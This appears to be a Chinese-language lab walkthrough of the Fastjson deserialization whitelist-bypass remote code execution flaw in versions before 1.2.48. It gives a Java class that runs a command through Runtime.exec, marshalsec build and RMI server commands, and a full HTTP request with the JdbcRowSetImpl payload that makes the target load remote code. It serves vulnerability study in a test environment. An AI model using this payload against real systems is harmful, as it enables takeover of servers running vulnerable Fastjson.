漏洞描述

Fastjson是阿里巴巴公司开源的一款json解析器，其性能优越，被广泛应用于各大厂商的Java项目中。 fastjson于1.2.24版本后增加了反序列化白名单，而在1.2.48以前的版本中，攻击者可以利用特殊构造的json字符串绕过白名单检测，成功执行任意命令。

参考链接：

• FastJson 远程代码执行漏洞分析报告 - 360CERT
• 浅谈Fastjson RCE漏洞的绕过史 - FreeBuf网络安全行业门户

漏洞环境及利用

搭建docker环境

首先编译并上传命令执行代码

// javac TouchFile.java
import java.lang.Runtime;
import java.lang.Process;

public class TouchFile {
    static {
        try {
            Runtime rt = Runtime.getRuntime();
            String[] commands = {"touch", "/tmp/success"};
            Process pc = rt.exec(commands);
            pc.waitFor();
        } catch (Exception e) {
            // do nothing
        }
    }
}

 javac编译文件

此处开启http服务

使用Java反序列化利用工具marshalsec辅助开启RMI环境

marshalsec：

git clone https://github.com/mbechler/marshalsec

maven：

 sudo apt-get install maven 

进入目录进行项目编译

mvn clean package -DskipTests

进入target目录，可以看到编译成功

 执行

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://刚class文件的ip或域名/#TouchFile" 9999

向靶场服务器发送Payload，带上RMI的地址：

POST / HTTP/1.1
Host: 192.168.232.128:8090
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json
Content-Length: 266

{
         "a":{
        "@type":"java.lang.Class",
        "val":"com.sun.rowset.JdbcRowSetImpl"
    },
    "b":{
        "@type":"com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName":"rmi://192.168.232.128:9999/TouchFile",
        "autoCommit":true
    }
}

漏洞利用